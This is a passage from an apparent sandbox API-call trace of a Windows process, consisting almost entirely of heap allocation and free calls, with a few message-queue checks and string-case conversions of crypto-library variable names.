(HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0034.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x796e) returned 0x955018 [0034.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0034.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0034.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0034.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0034.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1a8 [0034.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0034.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0034.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0034.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0034.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0034.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0034.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0034.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8896a0 [0034.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0034.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0034.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0034.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0034.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0034.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x796e) returned 0x964308 [0034.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0034.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0034.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0034.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0034.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0034.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0034.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0034.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0034.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0034.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0034.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0034.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0034.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0034.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0034.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0034.712] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0034.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0034.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0034.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0034.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0034.712] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0034.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0034.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0034.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0034.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0034.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0034.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0034.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0034.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0034.713] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0034.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da368 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0034.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc88 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0034.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0034.713] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0034.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0034.713] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0034.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0034.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0034.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0034.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0034.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0034.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0034.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0034.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0034.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0034.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0034.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0034.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0034.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0034.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0034.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0034.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0034.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0034.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0034.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0034.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0034.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0034.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0034.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0034.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.714] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0034.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0034.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0034.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0034.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0034.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0034.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0034.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0034.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0034.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0034.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0034.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0034.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0034.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0034.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0034.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0034.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0034.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0034.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0034.715] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0034.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0034.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0034.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0034.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0034.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0034.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0034.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0034.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0034.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0034.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.715] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0034.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cec8 [0034.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0034.715] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0034.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0034.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0034.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0034.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0034.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0034.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0034.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0034.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0034.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0034.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0034.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0034.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0034.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0034.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0034.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0034.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0034.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0034.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0034.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0034.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0034.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0034.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0034.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0034.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0034.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0034.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0034.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0034.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0034.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0034.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0034.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0034.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0034.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0034.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0034.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0034.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0034.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0034.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0034.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0034.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0034.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0034.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0034.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0034.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0034.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0034.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0034.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0034.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0034.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0034.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0034.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0034.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0034.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0034.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0034.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0034.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0034.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0034.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0034.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0034.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0034.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0034.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0034.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0034.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0034.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0034.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0034.718] RtlAllocateHeap 